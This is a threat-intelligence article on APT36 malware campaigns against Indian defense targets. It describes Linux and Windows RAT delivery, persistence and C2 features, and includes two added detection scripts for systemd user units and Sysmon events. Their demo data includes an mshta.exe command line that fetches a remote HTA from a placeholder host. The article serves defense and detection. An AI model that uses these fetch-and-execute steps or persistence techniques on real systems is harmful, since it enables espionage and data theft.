APT36 Intensifies Attacks on Indian Defense with Sophisticated Linux Malware

APT36, also known as Transparent Tribe, has intensified its cyber-espionage operations against Indian defense and government sectors by deploying sophisticated cross-platform malware, including new tools targeting Linux systems. Recent analyses by Aryaka Threat Research Labs reveal the group’s use of stealthy Remote Access Trojans (RATs) designed for persistent access and data exfiltration.

Spear-Phishing Tactics and Payload Delivery

APT36 and its affiliate SideCopy rely on spear-phishing to get into both Windows and Linux environments. The lures carry malicious LNK shortcuts, HTA files, ELF binaries and PPAM (PowerPoint add-in) files that trick the recipient into running the payload. Notably, the attackers host and distribute these files from compromised legitimate Indian domains such as innlive.in, which lends the phishing messages credibility.

Advanced Linux Malware Deployment

The group’s recent activity includes a UPX-packed ELF downloader written in Go. On execution it creates a hidden directory under the user’s home directory and fetches three files from the compromised domain:

– gkt3.1: The Ares RAT, a Python RAT bundled into an ELF binary with PyInstaller.

– gkt3.sh: A shell script that installs a systemd user service so the RAT is started automatically.

– Decoy PDF: A benign document shown to the victim while the RAT runs in the background.

The systemd user service starts the Ares RAT each time the user’s session comes up, so the implant survives reboots. Because it is a user-level unit it needs no root privileges to install and does not appear among the system services; it shows up only under systemctl --user, or when the unit files under ~/.config/systemd/user/ are inspected directly.
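The persistence described above is easy to hunt for on disk. The following is an added example, not code from the Aryaka report or from the malware: it scans the per-user systemd unit directories of a home and flags any service whose ExecStart runs something from a hidden directory under that home, whether written as an absolute path or through systemd’s %h specifier. The fake home, unit names, hidden directory names and unit contents are constructed for the demo and are not indicators from the report.

```python
"""Added example, not code from the Aryaka report or from APT36: hunt for
systemd *user* units that start something from a hidden directory under the
owner's home, the persistence pattern the gkt3.sh script is described as
installing.  The fake home, unit names, directory names and unit contents
below are constructed for the demo and are not indicators from the report."""
import shutil
import tempfile
from pathlib import Path

# Where systemd looks for per-user units (no root needed to write here).
USER_UNIT_DIRS = (".config/systemd/user", ".local/share/systemd/user")


def exec_start_commands(unit_path):
    """Yield the command part of every ExecStart= line in a unit file,
    with systemd's optional prefix characters (- @ : + !) removed."""
    with open(unit_path, encoding="utf-8", errors="replace") as fh:
        for raw in fh:
            line = raw.strip()
            if line.startswith("ExecStart="):
                yield line[len("ExecStart="):].lstrip("-@:+! ")


def suspicious_units(home):
    """Return sorted [(unit_path, command)] for .service units under `home`
    whose ExecStart runs from a dot-directory in that home, whether written
    as an absolute path or through the %h (home directory) specifier."""
    home = Path(home)
    hidden_prefixes = (f"{home}/.", "%h/.")
    hits = []
    for rel in USER_UNIT_DIRS:
        unit_dir = home / rel
        if not unit_dir.is_dir():
            continue
        for unit in sorted(unit_dir.glob("*.service")):
            for command in exec_start_commands(unit):
                if any(prefix in command for prefix in hidden_prefixes):
                    hits.append((str(unit), command))
    return hits


# --- constructed demo data (placeholders, not real indicators) ---------------
UNIT_ABS_PATH = """[Unit]
Description=Theme cache helper
[Service]
ExecStart={home}/.cache/.gtk/gkt3.1
Restart=always
[Install]
WantedBy=default.target
"""
UNIT_HOME_SPECIFIER = """[Unit]
Description=Font cache helper
[Service]
ExecStart=-%h/.local/.fc/fc-update
[Install]
WantedBy=default.target
"""
UNIT_BENIGN = """[Unit]
Description=Syncthing
[Service]
ExecStart=/usr/bin/syncthing serve --no-browser
[Install]
WantedBy=default.target
"""


def build_demo_home():
    """Create a throwaway fake home containing two suspicious units and one
    benign one; the caller removes it with shutil.rmtree when done."""
    home = Path(tempfile.mkdtemp(prefix="fakehome-"))
    unit_dir = home / ".config/systemd/user"
    unit_dir.mkdir(parents=True)
    (unit_dir / "gkt3.service").write_text(UNIT_ABS_PATH.format(home=home))
    (unit_dir / "fc-update.service").write_text(UNIT_HOME_SPECIFIER)
    (unit_dir / "syncthing.service").write_text(UNIT_BENIGN)
    return home


if __name__ == "__main__":
    # On a real host, loop over every directory in /home (and /root) instead.
    home = build_demo_home()
    for unit, command in suspicious_units(home):
        print(f"{unit}\n    -> {command}")
    shutil.rmtree(home)
```

Run against real homes, expect some legitimate hits (developer tools installed under ~/.local, for instance) and review each ExecStart by hand; the point is that a unit pulled from a dot-directory is worth a look, not that it is automatically malicious. Pair the file scan with `systemctl --user list-unit-files --state=enabled` run as each user, since an enabled unit can also live in a directory this script does not cover.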

Ares RAT Functionalities

Ares RAT, a Python-based Remote Access Trojan, begins by collecting system information: platform details, hostname, username and a unique bot identifier. It then walks the user’s home directory and sends the resulting file listing to the command-and-control (C2) server.

The RAT operates in a continuous loop, periodically communicating with the C2 server to receive and execute commands such as:

– cd: Change the current working directory.

– upload: Send local files to the C2 server.

– download: Retrieve files from the C2 server.

– listall: Recursively list files and send the listing to the C2 server.

– screenshot: Capture and transmit screenshots.

– persist: Establish or reinforce persistence mechanisms.

Parallel Windows Attacks

In parallel, APT36 continues to target Windows with LNK shortcuts that invoke mshta.exe to fetch JavaScript from compromised sites such as sifi.co.in. The script drives XAML deserialization and in-memory .NET deserialization to load the next stage without writing it to disk, culminating in GETA RAT. This .NET RAT talks to its C2 over AES-encrypted TCP on ports such as 8621 and can terminate processes, capture screenshots, run shell commands and perform file operations. It persists by dropping an entry into the Startup folder and modifying registry keys, and it checks for the presence of Kaspersky and Quick Heal antivirus products in order to evade them.
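The Windows chain above leaves three observables that ordinary endpoint telemetry captures: mshta.exe started with a remote URL on its command line, an outbound TCP connection to the beacon port, and a file dropped into the user’s Startup folder. The triage function below is an added example, not code from the report or from the malware; it assumes Sysmon field names (event IDs 1, 3 and 11), takes port 8621 from the report as its only beacon port, and runs over constructed events whose host, user, paths, domain and IP addresses are placeholders rather than indicators.

```python
"""Added example, not code from the Aryaka report or from APT36: triage
Sysmon-style events for three observables in the Windows chain described
above: mshta.exe pulling a remote script, an outbound TCP connection to the
beacon port the report names (8621), and a file dropped into the user's
Startup folder.  Field names follow Sysmon event IDs 1, 3 and 11; the events
below are constructed for the demo, and the host, user, paths, domain and IP
addresses in them are placeholders, not indicators from the report."""
import re

REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
BEACON_PORTS = {8621}  # "ports such as 8621"; extend from your own IoC feed


def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return [(UtcTime, rule, detail)] for every event matching a rule."""
    findings = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 1 and image_name(ev["Image"]) == "mshta.exe":
            # LNK -> mshta.exe -> remote script: a URL on the command line is the tell.
            match = REMOTE_URL.search(ev.get("CommandLine", ""))
            if match:
                findings.append((ev["UtcTime"], "mshta_remote_script",
                                 f"{match.group(0)} (parent {image_name(ev['ParentImage'])})"))
        elif eid == 3 and int(ev["DestinationPort"]) in BEACON_PORTS:
            # Any process talking to the RAT's TCP port is worth a look.
            findings.append((ev["UtcTime"], "beacon_port",
                             f"{image_name(ev['Image'])} -> "
                             f"{ev['DestinationIp']}:{ev['DestinationPort']}"))
        elif eid == 11 and STARTUP_DIR.search(ev["TargetFilename"]):
            # Startup-folder persistence: anything written there by a non-installer.
            findings.append((ev["UtcTime"], "startup_folder_drop", ev["TargetFilename"]))
    return findings


# --- constructed demo events (placeholders, not indicators) ------------------
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2025-01-01 09:00:01",
     "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://news.example.invalid/x/update.hta'},
    {"EventID": 1, "UtcTime": "2025-01-01 09:05:00",          # local HTA: benign
     "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Vendor\setup.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\help.hta"'},
    {"EventID": 3, "UtcTime": "2025-01-01 09:00:09",
     "Image": r"C:\Users\alice\AppData\Roaming\svchost\svchost.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 8621},
    {"EventID": 3, "UtcTime": "2025-01-01 09:00:12",          # normal HTTPS: benign
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationIp": "198.51.100.7", "DestinationPort": 443},
    {"EventID": 11, "UtcTime": "2025-01-01 09:00:05",
     "Image": r"C:\Windows\System32\mshta.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDriveUpd.lnk"},
    {"EventID": 11, "UtcTime": "2025-01-01 09:07:30",         # ordinary document: benign
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "TargetFilename": r"C:\Users\alice\Documents\notes.docx"},
]

if __name__ == "__main__":
    for when, rule, detail in triage(SAMPLE_EVENTS):
        print(f"{when}  {rule:<22} {detail}")
```

The mshta rule is the highest-signal of the three: mshta.exe has few legitimate reasons to be handed a URL, and when its parent is explorer.exe the launch almost always traces back to a double-clicked shortcut. The port rule is deliberately narrow; it is only as good as the IoC feed behind BEACON_PORTS, so treat it as enrichment rather than a standalone detection.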

Desk RAT and Additional Windows Exploits

Another tool in APT36’s arsenal is the Go-based Desk RAT, delivered through PPAM lures with titles such as Project Vijayak BRO Updates. The lures carry auto-running VBA macros that download ZIP archives from domains such as defenceindia.siteteamindia. Desk RAT profiles system resources, persists through a registry Run key and looks up the host’s public IP address through services such as ipify.org. It talks to its C2 server over WebSocket, sending telemetry and waiting for commands to browse the file system, upload files and execute them, among other functions.

Indicators of Compromise and Defensive Measures

Security researchers have published indicators of compromise (IoCs) for these campaigns, including IP addresses, domain names and file hashes. Organizations are advised to block domains such as innlive.in and sifi.co.in, and to monitor for mshta.exe launched with a remote URL on its command line, newly created systemd user units on Linux hosts, and WebSocket connections originating from processes that are not browsers. DNS filtering and a Secure Web Gateway (SWG) help detect and block the phishing stage, while Intrusion Detection and Prevention Systems (IDS/IPS) can pick up the beaconing and encrypted C2 traffic.

Conclusion

APT36’s recent activities underscore a significant escalation in their cyber-espionage capabilities, particularly with the development and deployment of advanced Linux malware. Their strategic use of trusted domains for payload distribution, combined with sophisticated persistence and evasion techniques, poses a substantial threat to Indian defense and government sectors. Continuous vigilance, robust cybersecurity measures, and user education are imperative to mitigate the risks associated with such advanced persistent threats.